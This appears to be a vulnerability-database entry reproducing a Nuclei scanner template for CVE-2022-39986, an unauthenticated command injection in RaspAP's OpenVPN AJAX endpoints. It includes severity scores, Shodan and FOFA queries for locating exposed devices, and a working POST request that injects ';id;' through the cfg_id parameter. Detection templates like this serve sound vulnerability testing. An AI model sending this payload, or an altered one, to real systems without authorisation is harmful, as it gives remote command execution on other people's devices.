Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-39986
HistoryAug 18, 2023 - 10:31 a.m.

RaspAP 2.8.7 - Unauthenticated Command Injection

2023-08-1810:31:22
ProjectDiscovery
github.com
4
cve
2022
packetstorm
raspap
rce

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.881 High

EPSS

Percentile

98.7%

A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
id: CVE-2022-39986

info:
  name: RaspAP 2.8.7 - Unauthenticated Command Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
  remediation: |
    Upgrade to a patched version of RaspAP or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-39986
    - https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2
    - http://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html
    - https://github.com/RaspAP/raspap-webgui/blob/master/ajax/openvpn/activate_ovpncfg.php
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-39986
    cwe-id: CWE-77
    epss-score: 0.87977
    epss-percentile: 0.98588
    cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: raspap
    product: raspap
    shodan-query: http.favicon.hash:-1465760059
    fofa-query: icon_hash=-1465760059
  tags: cve,cve2022,packetstorm,raspap,rce

http:
  - raw:
      - |
        POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        cfg_id=;id;#

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210099aa294bb03eed7043659c0199250e623d100e601d57357d3553dc6fd561d7e1022100bad06d4676647348c828a779719ab60d9b7cfd97baa3c3c4d1903c935eb92c78:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.881 High

EPSS

Percentile

98.7%